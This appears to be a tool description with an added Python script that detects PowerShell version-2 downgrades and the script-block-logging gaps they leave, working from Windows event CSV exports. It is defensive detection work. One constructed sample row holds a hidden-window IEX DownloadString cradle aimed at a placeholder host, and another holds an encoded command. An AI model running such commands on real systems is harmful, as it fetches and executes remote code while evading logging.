drop a 4688 or powershell evtx csv · detects powershell.exe -version 2 (engine downgrade) · engine start/stop events 400/403 · script block logging gaps (the v2 engine emits no 4104) · export csv · runs locally
accepted input: security 4688 (process creation, needs command-line auditing enabled) · windows powershell 400/403 (engine start/stop) · optional 4104 (script block logging) for gap correlation · sysmon csv
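The correlation the tool performs, written out as an added Python example (not the tool's own code): it reads CSV exports of Security 4688, Windows PowerShell 400/403 and optional 4104 events, flags powershell.exe launched with any prefix of -Version 2, flags 400 events whose EngineVersion is 2.x, ties the two together on a time window, and counts 4104 events inside each v2 session. The sample rows and the column names (TimeCreated, NewProcessName, CommandLine, EngineVersion, RunspaceId, ScriptBlockText) are constructed assumptions about what an EVTX-to-CSV exporter produces.

```python
"""
Offline triage of PowerShell engine-downgrade evidence (added example, not
the tool's code). Flags powershell.exe started with -version 2, flags 400
events reporting EngineVersion 2.x, correlates the two, and checks each v2
session for 4104 script block events. The v2 engine predates script block
logging, so a v2 session logs no 4104 at all: that is the gap. Column names
are assumptions about an EVTX-to-CSV exporter; all rows are constructed.
"""
import csv
import io
import re
from datetime import datetime, timedelta

# Constructed Security-log export (4688). Column names are assumed.
SECURITY_4688_CSV = r"""TimeCreated,EventID,SubjectUserName,NewProcessName,CommandLine
2024-05-01T10:00:00,4688,alice,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,"powershell.exe -nop -w hidden -v 2 -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
2024-05-01T10:05:00,4688,bob,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,"powershell.exe -NoProfile -File C:\scripts\backup.ps1"
2024-05-01T10:10:00,4688,SYSTEM,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,"powershell.exe -Version 2.0 -EncodedCommand SQBFAFgA"
2024-05-01T10:20:00,4688,carol,C:\Windows\System32\cmd.exe,"cmd.exe /c echo -version 2"
"""

# Constructed "Windows PowerShell" classic-log export (400 = engine started,
# 403 = engine stopped). EngineVersion and RunspaceId are assumed to have
# been parsed out of the event message by the exporter.
POWERSHELL_400_403_CSV = r"""TimeCreated,EventID,HostName,HostVersion,EngineVersion,RunspaceId
2024-05-01T10:00:01,400,ConsoleHost,2.0,2.0,r-1
2024-05-01T10:00:09,403,ConsoleHost,2.0,2.0,r-1
2024-05-01T10:05:01,400,ConsoleHost,5.1.19041.1,5.1.19041.1,r-2
2024-05-01T10:05:30,403,ConsoleHost,5.1.19041.1,5.1.19041.1,r-2
"""

# Constructed Microsoft-Windows-PowerShell/Operational export (4104).
OPERATIONAL_4104_CSV = r"""TimeCreated,EventID,ScriptBlockText
2024-05-01T10:05:02,4104,& 'C:\scripts\backup.ps1'
"""

# powershell.exe accepts any unambiguous prefix of -Version, so -v 2, -ver 2
# and -Version 2.0 all select the v2 engine.
DOWNGRADE_RE = re.compile(
    r"(?<!\S)-(?:version|versio|versi|vers|ver|ve|v)\s+2(?:\.0)?(?!\S)", re.IGNORECASE)


def parse_events(text):
    """Parse a CSV export into dict rows, adding a parsed timestamp as '_ts'."""
    rows = list(csv.DictReader(io.StringIO(text)))
    for row in rows:
        row["_ts"] = datetime.fromisoformat(row["TimeCreated"])
    return rows


def find_downgrade_launches(sec_rows):
    """4688 rows where Windows PowerShell itself was started with -version 2."""
    return [r for r in sec_rows
            if r["EventID"] == "4688"
            and r["NewProcessName"].lower().endswith("powershell.exe")
            and DOWNGRADE_RE.search(r["CommandLine"])]


def find_v2_engine_starts(ps_rows):
    """400 rows whose EngineVersion shows the 2.x engine actually came up."""
    return [r for r in ps_rows
            if r["EventID"] == "400" and r["EngineVersion"].startswith("2.")]


def correlate(sec_rows, ps_rows, op_rows, window=timedelta(seconds=30)):
    """Join downgrade launches to engine starts; count 4104 inside each v2 session."""
    findings = []
    v2_starts = find_v2_engine_starts(ps_rows)
    for launch in find_downgrade_launches(sec_rows):
        # A 400 with EngineVersion 2.x shortly after the 4688 confirms the downgrade
        # took effect; none in the window means the engine start was not observed
        # (v2 engine not installed, or the PowerShell log missing/truncated).
        seen = any(timedelta(0) <= s["_ts"] - launch["_ts"] <= window for s in v2_starts)
        findings.append({"kind": "downgrade_launch",
                         "time": launch["TimeCreated"],
                         "user": launch["SubjectUserName"],
                         "command": launch["CommandLine"],
                         "engine_start_seen": seen})
    for start in v2_starts:
        # Session ends at the matching 403 (same RunspaceId); fall back to the window.
        stop = next((r for r in ps_rows if r["EventID"] == "403"
                     and r["RunspaceId"] == start["RunspaceId"]
                     and r["_ts"] >= start["_ts"]), None)
        end = stop["_ts"] if stop else start["_ts"] + window
        logged = [r for r in op_rows if r["EventID"] == "4104"
                  and start["_ts"] <= r["_ts"] <= end]
        findings.append({"kind": "v2_engine_session",
                         "time": start["TimeCreated"],
                         "runspace": start["RunspaceId"],
                         "scriptblocks_logged": len(logged)})  # 0 = script block logging gap
    return findings


def analyze_samples():
    """Run the correlation over the constructed exports above."""
    return correlate(parse_events(SECURITY_4688_CSV),
                     parse_events(POWERSHELL_400_403_CSV),
                     parse_events(OPERATIONAL_4104_CSV))
```

Calling analyze_samples() on the constructed data returns two downgrade launches (the -v 2 one confirmed by a 400 with EngineVersion 2.0 one second later, the -Version 2.0 one with no engine start observed) and one v2 session with zero 4104 events; the cmd.exe row that merely echoes "-version 2" is excluded by the process-name filter. Replace the three CSV constants with real exports whose columns match, or rename the keys to your exporter's headers.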